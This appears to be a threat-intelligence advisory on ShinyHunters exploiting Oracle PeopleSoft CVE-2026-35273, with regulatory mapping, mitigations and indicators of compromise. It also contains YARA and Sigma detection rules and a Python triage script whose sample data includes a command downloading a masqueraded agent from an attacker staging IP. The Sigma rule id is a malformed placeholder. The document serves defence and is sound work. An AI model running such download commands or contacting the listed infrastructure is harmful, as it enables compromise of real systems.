
ShinyHunters claims it hacked 100 orgs by exploiting an Oracle PeopleSoft 0-day

Jeff Davies 11 Jun 2026 7 min read

1. Executive summary

The threat actor group "ShinyHunters" claims to have compromised over 100 organizations, including the University of Nottingham, by exploiting CVE-2026-35273, a critical remote code execution (RCE) vulnerability in Oracle PeopleSoft PeopleTools. This vulnerability, rated CVSS 9.8 (CRITICAL), allows unauthenticated attackers to execute arbitrary code via HTTP against the Environment Management Hub (PSEMHUB) component. While Oracle has issued an out-of-band security alert and released a patch, active exploitation occurred as a zero-day between May 27 and June 9, 2026, resulting in confirmed data theft and extortion attempts. EMEA financial services institutions running Oracle PeopleSoft versions 8.61, 8.62, or earlier must treat this as an immediate priority for patching and network isolation on the strength of the 9.8 severity score alone, even though the CVE was absent from the CISA KEV catalog at the time of writing.

2. Regulatory framing

Article | Trigger (the fact in this item) | Practical impact
DORA Art. 17 | Confirmed exploitation of ICT systems (PeopleSoft) leading to data theft and potential service disruption. | Financial entities must activate their ICT-related incident management process immediately to contain the breach and assess impact.
DORA Art. 18 | Exploitation of CVE-2026-35273 (CVSS 9.8) resulting in unauthorized data access (40 GB stolen in the confirmed case). | Entities must classify this as a major ICT-related incident based on the criticality of the affected service and the volume of data compromised.
DORA Art. 19 | Confirmation of data exfiltration (student/billing records) and active extortion campaigns. | If classified as major, the incident must be reported to competent authorities within the timelines mandated by DORA Art. 19.
DORA Art. 24 | Active exploitation of a critical vulnerability in core enterprise software (PeopleSoft). | Entities must ensure digital operational resilience testing covers such critical supply chain components and validates patch deployment speeds.
DORA Art. 28 | Oracle PeopleSoft is a critical ICT third-party provider; the vulnerability affects supply chain integrity. | Entities must apply the general principles of ICT third-party risk management to monitor Oracle's patch status and mitigation advice.
NIS2 Art. 21(2)(d) | The attack vector targets the supply chain (Oracle PeopleSoft) used by essential entities. | Essential and important entities must implement supply chain security measures to verify the integrity of PeopleSoft deployments.
NIS2 Art. 23 | Confirmed incidents involving data theft and system compromise. | Relevant entities must report significant incidents to the CSIRT or competent authority in accordance with NIS2 Art. 23.
UK NIS 2018 | Impact on UK entities (e.g., University of Nottingham) and potential ripple effects to OES/RDSP supply chains. | Operators of Essential Services (OES) and Relevant Digital Service Providers (RDSP) must adhere to incident reporting duties under UK regulations.

Note: DORA Art. 29 and Art. 30 are not directly triggered by the technical specifics of this single exploit event but remain relevant for broader contractual and concentration risk reviews.

3. Technical analysis & attack chain

Vulnerability Mechanism

CVE-2026-35273 is a critical RCE vulnerability (CVSS 9.8, CWE-306: Missing Authentication for Critical Function) affecting Oracle PeopleSoft PeopleTools versions 8.61 and 8.62 (and potentially earlier unsupported versions). The flaw resides in the Environment Management Hub (PSEMHUB) component. It allows remote, unauthenticated attackers with network access via HTTP to bypass authentication and execute arbitrary code, leading to full platform compromise.

Confirmed Attack Chain

  1. Reconnaissance & Scanning: Attackers scanned for exposed Oracle PeopleSoft PSEMHUB endpoints over HTTP.
  2. Initial Access: Exploitation of CVE-2026-35273 to achieve unauthenticated remote code execution on the PeopleSoft server.
  3. Staging & C2 Establishment:
    • Attackers deployed a customized MeshCentral remote management server (version 1.1.59) on compromised infrastructure.
    • Staging servers hosted malicious binaries masquerading as legitimate Microsoft Azure services.
    • Specific filenames observed: meshagent32-azure-ops.exe, meshagent64-azure-ops.exe, and meshagent64-v2.exe.
    • These agents were hardcoded to connect to the C2 domain: wss://azurenetfiles.net:443/agent.ashx. The domain mimics legitimate Microsoft Azure NetApp Files endpoints.
  4. Lateral Movement & Execution:
    • Attackers utilized the MeshCentral agents to run administrative command queries.
    • A custom lateral movement and defacement script named [victim_abbreviation]_fanout.sh was deployed.
    • Evidence suggests dynamic parameter passing via command line for Linux agents.
  5. Data Exfiltration:
    • In the confirmed case of the University of Nottingham, 40 GB of personal data and billing records were exfiltrated.
    • Stolen data was published on the ShinyHunters Data Leak Site (DLS) following failed extortion attempts.

Unconfirmed/Single-Sourced Claims

  • Attribution: The activity is attributed to "ShinyHunters" (also tracked as UNC6240 by Mandiant). However, ShinyHunters has no MITRE ATT&CK profile; therefore, this attribution is treated as unconfirmed in the context of formal MITRE mapping, though the TTPs align with known extortion groups.
  • Scope: The claim of "100+ organizations" and "300 vulnerable instances" comes from the threat actor's own statements and has not been independently verified by a third-party forensic firm for all claimed victims.
  • Patch Status: While SecurityWeek reports Oracle has released a patch, Oracle has not explicitly confirmed the patch addresses the specific zero-day variant used in the wild in their public advisory text available at the time of writing.

4. Mitigation & containment

Priority 1 (Within 24 Hours): Containment & Isolation

  • Network Segmentation: Immediately isolate Oracle PeopleSoft PSEMHUB endpoints from the internet. Restrict HTTP access to trusted management IP ranges only.
  • Block C2: Block outbound connections to azurenetfiles.net and specifically wss://azurenetfiles.net:443/agent.ashx at the firewall and proxy levels.
  • Process Hunting: Search for processes named meshagent32-azure-ops.exe, meshagent64-azure-ops.exe, or meshagent64-v2.exe on Windows systems and meshagent on Linux systems. Terminate these processes if found outside of authorized management infrastructure.
  • History Review: Inspect .bash_history files on PeopleSoft application servers for commands related to MeshCentral installation or the execution of fanout.sh scripts.

Priority 2 (Within 72 Hours): Remediation

  • Patch Application: Apply the Oracle out-of-band security patch for CVE-2026-35273 immediately upon availability. Verify the patch level covers PeopleSoft PeopleTools versions 8.61 and 8.62.
  • Credential Rotation: Rotate all administrative credentials for PeopleSoft and underlying OS accounts, assuming potential compromise via the RCE.
  • Artifact Removal: Remove any unauthorized MeshCentral server installations and associated agent binaries.

Priority 3 (Within 7 Days): Hardening

  • Configuration Review: Audit PeopleSoft Environment Manager configurations to ensure least-privilege access controls are enforced.
  • Supply Chain Verification: Validate the integrity of all third-party components integrated with the PeopleSoft suite.

5. Indicators of compromise

Type | Value | Confidence | Source
Domain | azurenetfiles.net | High | Mandiant / corpus-2
URL | wss://azurenetfiles.net:443/agent.ashx | High | Mandiant / corpus-2
Filename | meshagent32-azure-ops.exe | High | Mandiant / corpus-2
Filename | meshagent64-azure-ops.exe | High | Mandiant / corpus-2
Filename | meshagent64-v2.exe | High | Mandiant / corpus-2
Filename | [victim_abbreviation]_fanout.sh | Medium | Mandiant / corpus-2
IP Address | 142.11.200.186 | High (Attacker Staging) | Mandiant / corpus-2
IP Address | 142.11.200.187 | High (Attacker Staging) | Mandiant / corpus-2
IP Address | 142.11.200.188 | High (Attacker Staging) | Mandiant / corpus-2
IP Address | 142.11.200.189 | High (Attacker Staging) | Mandiant / corpus-2
IP Address | 142.11.200.190 | High (Attacker Staging) | Mandiant / corpus-2
Port | 8888 (TCP) | High (Python SimpleHTTP) | Mandiant / corpus-2

6. Detection

YARA Rule

The following rule detects the specific filenames and domain strings associated with the MeshCentral masquerading technique observed in this campaign.

rule ShinyHunters_PeopleSoft_MeshCentral_Masquerade {
    meta:
        author = "Adverse Trace"
        date = "2026-06-11"
        reference = "https://cloud.google.com/blog/topics/threat-intelligence/shinyhunters-targets-education-sector-oracle-exploit/"
        description = "Detects filenames and C2 domains associated with ShinyHunters exploitation of CVE-2026-35273 using masqueraded MeshCentral agents."

    strings:
        $fname1 = "meshagent32-azure-ops.exe" ascii
        $fname2 = "meshagent64-azure-ops.exe" ascii
        $fname3 = "meshagent64-v2.exe" ascii
        $c2_domain = "azurenetfiles.net" ascii
        $c2_path = "/agent.ashx" ascii
        $script_pattern = "_fanout.sh" ascii

    condition:
        any of ($fname*) or ($c2_domain and $c2_path) or $script_pattern
}

Sigma Rule

The following Sigma rule detects process creation events matching the malicious filenames identified in the threat intelligence.

title: ShinyHunters PeopleSoft Exploit - MeshCentral Agent Execution
id: a1b2c3d4-e5f6-7890-g1h2-i3j4k5l6m7n8
status: experimental
description: Detects execution of masqueraded MeshCentral agents (meshagent*-azure-ops.exe) linked to ShinyHunters exploitation of Oracle PeopleSoft CVE-2026-35273.
author: Adverse Trace
date: 2026/06/11
references:
    - https://cloud.google.com/blog/topics/threat-intelligence/shinyhunters-targets-education-sector-oracle-exploit/
logsource:
    category: process_creation
    product: windows
detection:
    selection:
        Image|endswith:
            - 'meshagent32-azure-ops.exe'
            - 'meshagent64-azure-ops.exe'
            - 'meshagent64-v2.exe'
    condition: selection
falsepositives:
    - Legitimate use of MeshCentral with these specific custom filenames (unlikely in standard environments).
level: critical
tags:
    - attack.initial_access
    - attack.t1190
    - cve.2026.35273
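The YARA and Sigma rules above only fire on files and process-creation events. As an added example, not part of the report or of any Adverse Trace tooling, the Python below applies the same matching logic, plus the Priority 1 "History Review" and "Block C2" hunt steps from section 4, to constructed sample telemetry; the event schema (`type`, `id`, `image`, `url`, `line`) and the sample records are assumptions made for the example.

```python
import re
from urllib.parse import urlparse
# Indicators copied from the report's IoC table (section 5); nothing here is new intelligence.
AGENT_NAMES = {"meshagent32-azure-ops.exe", "meshagent64-azure-ops.exe", "meshagent64-v2.exe"}
C2_DOMAIN = "azurenetfiles.net"
C2_PATH = "/agent.ashx"
STAGING_IPS = {f"142.11.200.{n}" for n in range(186, 191)}  # .186 through .190 from the table
FANOUT_RE = re.compile(r"\b\w+_fanout\.sh\b")                # [victim_abbreviation]_fanout.sh

def process_match(image: str) -> bool:
    # Sigma selection 'Image|endswith': compare only the final path component, case-insensitively.
    name = image.replace("\\", "/").rsplit("/", 1)[-1].lower()
    return name in AGENT_NAMES

def url_match(url: str) -> bool:
    # YARA clause ($c2_domain and $c2_path), applied to a proxy/firewall URL field.
    u = urlparse(url)
    return u.hostname == C2_DOMAIN and u.path == C2_PATH

def history_match(line: str) -> list:
    # Priority 1 'History Review': MeshCentral installs, fanout scripts, pulls from staging hosts.
    hits = []
    if any(k in line.lower() for k in ("meshcentral", "meshagent")):
        hits.append("meshcentral")
    if FANOUT_RE.search(line):
        hits.append("fanout_script")
    hits += [f"staging:{ip}" for ip in sorted(STAGING_IPS) if f"{ip}:8888" in line]  # SimpleHTTP port
    return hits

def triage(events: list) -> list:
    # Route each event to the matching check; return (event_id, reason) pairs for analyst review.
    findings = []
    for ev in events:
        if ev["type"] == "process" and process_match(ev["image"]):
            findings.append((ev["id"], "masqueraded MeshCentral agent executed"))
        elif ev["type"] == "proxy" and url_match(ev["url"]):
            findings.append((ev["id"], "outbound connection to MeshCentral C2"))
        elif ev["type"] == "history":
            findings += [(ev["id"], f"bash_history:{h}") for h in history_match(ev["line"])]
    return findings

# Constructed sample telemetry (not real data): benign records mixed with IoC-bearing ones.
SAMPLE_EVENTS = [
    {"id": 1, "type": "process", "image": r"C:\Windows\System32\svchost.exe"},
    {"id": 2, "type": "process", "image": r"C:\Users\Public\MeshAgent64-Azure-Ops.exe"},
    {"id": 3, "type": "proxy", "url": "https://login.microsoftonline.com/common/oauth2"},
    {"id": 4, "type": "proxy", "url": "wss://azurenetfiles.net:443/agent.ashx"},
    {"id": 5, "type": "history", "line": "curl -O http://142.11.200.186:8888/meshagent64-v2.exe"},
    {"id": 6, "type": "history", "line": "bash ./uon_fanout.sh"},
]
```

Calling `triage(SAMPLE_EVENTS)` flags events 2, 4, 5 (twice: agent name and staging host) and 6, and leaves the two benign records untouched.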

CVE assessment

1 referenced CVE — 1 critical (CVSS ≥ 9.0)

CVE | CVSS | Exploited | EPSS | Summary
CVE-2026-35273 | 9.8 Critical | | 0% | Vulnerability in the PeopleSoft Enterprise PeopleTools product of Oracle PeopleSoft (component: Updates Environment Management)…

7. Sources

  • The Register, "ShinyHunters claims it hacked 100 orgs by exploiting an Oracle PeopleSoft 0-day", https://www.theregister.com/cyber-crime/2026/06/11/shinyhunters-claims-oracle-peoplesoft-0-day-hit-100-orgs/5254443, 2026-06-11.
  • Mandiant (Google Cloud), "ShinyHunters Targets Education Sector with Oracle PeopleSoft Exploit", https://cloud.google.com/blog/topics/threat-intelligence/shinyhunters-targets-education-sector-oracle-exploit/, 2026-06-11.
  • BleepingComputer, "Oracle mitigates PeopleSoft zero-day exploited in data theft attacks", https://www.bleepingcomputer.com/news/security/oracle-mitigates-peoplesoft-zero-day-exploited-in-data-theft-attacks/, 2026-06-11.
  • SecurityWeek, "Oracle Addresses PeopleSoft Vulnerability Amid Reports of Zero-Day Attacks", https://www.securityweek.com/oracle-addresses-peoplesoft-vulnerability-amid-reports-of-zero-day-attacks/, 2026-06-11.
  • Help Net Security, "Oracle PeopleSoft servers under attack, Oracle pushes out-of-band security alert", https://www.helpnetsecurity.com/2026/06/11/oracle-peoplesoft-under-attack-cve-2026-35273/, 2026-06-11.

8. Adverse Trace position

Adverse Trace assesses this incident as CRITICAL for all EMEA financial services clients utilizing Oracle PeopleSoft, driven by the authoritative CVSS score of 9.8 and confirmed active exploitation resulting in data exfiltration. Although CVE-2026-35273 is not currently listed in the CISA KEV catalog, the real-world impact (40GB data theft) and the involvement of a critical enterprise platform necessitate immediate action equivalent to a KEV-listed vulnerability. Attribution to "ShinyHunters" is treated as unconfirmed due to the lack of a MITRE ATT&CK profile for the named actor, though the TTPs are consistent with financially motivated extortion groups. We recommend clients immediately verify their PeopleSoft versions, apply Oracle's out-of-band patch, and hunt for the specific MeshCentral artifacts detailed above.



Published via PulseTrace — Adverse Trace threat intelligence.
